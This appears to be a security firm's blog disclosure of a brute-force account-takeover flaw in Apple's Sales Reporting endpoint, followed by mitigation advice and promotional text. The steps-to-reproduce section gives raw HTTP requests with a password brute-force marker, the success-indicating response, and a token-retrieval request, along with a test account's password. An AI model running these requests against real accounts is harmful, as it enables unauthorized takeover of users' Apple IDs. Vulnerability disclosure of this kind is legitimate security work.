Published on

AppleID Account Takeover via Brute Forcing App-Specific Password or Accounts with No 2FA

Authors
tailwind-nextjs-banner

IMPORTANT

Don’t Let Your Customer Data Fall into the Wrong Hands.
Contact Us Now for a free consultation and find out how Agilehunt can protect your digital assets.

VULNERABILITY OVERVIEW

An attacker can brute-force credentials using a vulnerable endpoint on the Apple Sales Reporting service to gain unauthorized access to an account associated with an app-specific password or an Apple ID account without two-factor authentication (2FA) enabled. The vulnerability is in the lack of rate limiting and weak validation mechanisms for password-based authentication at the https://reportingitc-reporter.apple.com/reportservice/sales/v1 endpoint invoked by Reporter tool

By sending a brute-forced password in the jsonRequest payload, an attacker can retrieve a valid access token for the victim's AppleID account.

Upon finding the correct password, the response returns an indicator requesting the user to place the access token inside a properties file, revealing that the password was correct. Once the correct password is discovered, the attacker can continue with another request using the same requestId or SERVICE_REQUEST_ID from the response for valid password to retrieve the access token, allowing full access to the AppleID account.

RISK BREAKDOWN

  • Risk: HIGH
  • Difficulty to Exploit: Medium

STEPS TO REPRODUCE

  1. Identify an account with app-specific passwords or AppleID without 2FA :

    • Ensure the target AppleID has is using an app-specific password or no two-factor authentication (2FA) enabled . In this case for POC hello@agilehunt.com is an apple account used by ourself

  2. Install Proxchains and configure it to route traffic through Burp Suite for request interception:

    Download and configure the Reporter tool from iTunes Partner (https://itunespartner.apple.com/assets/downloads/Reporter.zip) . Set up the configuration file (Reporter.properties) with basic settings.

    Run the following command to generate a token and intercept the request:

    proxychains -f /etc/proxychains.conf java -jar Reporter.jar p=Reporter.properties Sales.generateToken

  • Intercept the request and use the following POST request in Burp Intruder and place marker to "password" parameter :

POST /reportservice/sales/v1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Java/11.0.21
Host: target.apple.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 373

jsonRequest={"mode":"Normal","password":"$$brutepass$$","queryInput":"%5Bp%3DReporter.properties%2C+Sales.generateToken%5D","salesurl":"https%3A%2F%2Freportingitc-reporter.apple.com%2Freportservice%2Fsales%2Fv1","accesstoken":"","userid":"victim%40target.com","version":"2.2","financeurl":"https%3A%2F%2Freportingitc-reporter.apple.com%2Freportservice%2Ffinance%2Fv1"}

  1. Bruteforce the password with various password combinations. until a valid password is found. Observe that there is no rate limiting implemented and we were able to send 500+ requests without any blocks or rate limitng and found the right password.

    Check Response for Success:

    • If the response has a Response Status Code 200 OK or content length of 105 / 1267 and includes:

      "You are required to place your Access Token inside your properties file. Do you want to continue? (y/n): "

      This indicates that the brute-forced password was correct.

      RAW HTTP Response :

      HTTP/1.1 200 OK
Server: Apple
Date: Sat, 28 Sep 2024 06:48:48 GMT
Content-Type: text/html;charset=iso-8859-1
Content-Length: 105
Connection: keep-alive
requestId: 42bff5a0-ece5-481b-bd56-50eab6bd1ffc
EXISTING_TOKEN: Y
SERVICE_REQUEST_ID: 42bff5a0-ece5-481b-bd56-50eab6bd1ffc

You are required to place your Access Token inside your properties file. Do you want to continue? (y/n):

  2. Extract requestId or SERVICE_REQUEST_ID:

    • In the successful response, note the requestId (e.g., 42bff5a0-ece5-481b-bd56-50eab6bd1ffc).

  3. Send Request to Retrieve Access Token:

    • Use the requestId from step 4 and valid password found, in below request to obtain the Access Token:
    POST /reportservice/sales/v1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Java/11.0.21
Host: reportingitc-reporter.apple.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-Length: 438

jsonRequest={"mode":"Normal","password":"dzshtqaoqeknnzeg","queryInput":"%5Bp%3DReporter.properties%2C+Sales.generateToken%5D","salesurl":"https%3A%2F%2Freportingitc-reporter.apple.com%2Freportservice%2Fsales%2Fv1","accesstoken":"","userid":"hello%40agilehunt.com","version":"2.2","financeurl":"https%3A%2F%2Freportingitc-reporter.apple.com%2Freportservice%2Ffinance%2Fv1"}&isExistingToken=y&requestId=42bff5a0-ece5-481b-bd56-50eab6bd1ffc

  4. Obtain Access Token:

    • The response will contain the valid Access Token, granting the attacker full access to the victim's AppleID account.

IMPACT

  • This vulnerability allows an attacker to access the specific application associated with an app-specific password if brute-forced successfully or to take over an Apple ID account that does not have two-factor authentication (2FA) enabled.. With a valid access token, the attacker can impersonate the victim, gain access to sensitive information, and use the account for malicious activities, including accessing Apple services linked to that account.

RECOMMENDATION

  • Enforce Strong Password Policies:

    • Implement stricter password requirements, such as enforcing rate limits and CAPTCHA challenges for failed login attempts, to prevent brute-force attacks.

  • Enforce Two-Factor Authentication (2FA):

    • Accounts with app-specific passwords should also require 2FA as an additional security layer.

  • Add Rate Limiting on Authentication Attempts:

    • Implement rate-limiting mechanisms to block multiple failed login attempts within a short time frame to mitigate brute-force attacks.

CONCLUSION

  • In today's high-stakes digital landscape, securing user accounts is paramount. This discovery emphasizes the importance of robust authentication practices and endpoint validation. This issue highlights the need for robust security measures like mandatory 2FA and proper rate limiting, which AgileHunt can help implement to safeguard user accounts.

REFERENCES

For more information check out reference [[1]]

WHY CHOOSE AGILEHUNT?

With more than 10+ years of experience and a track record of safeguarding businesses from web vulnerabilities, Agilehunt offers:

  • Comprehensive security assessments for web applications.
  • Tailored security solutions designed to protect against attacks like Account Takeovers.
  • Proactive defense strategies to keep your business one step ahead of cyber threats.

We’ve worked with top companies worldwide to secure their applications and prevent devastating data breaches. Don’t wait until an attack happens—secure your business now.

Contact Agilehunt for a free consultation and take the first step toward safeguarding your sensitive information.

Discuss on Twitter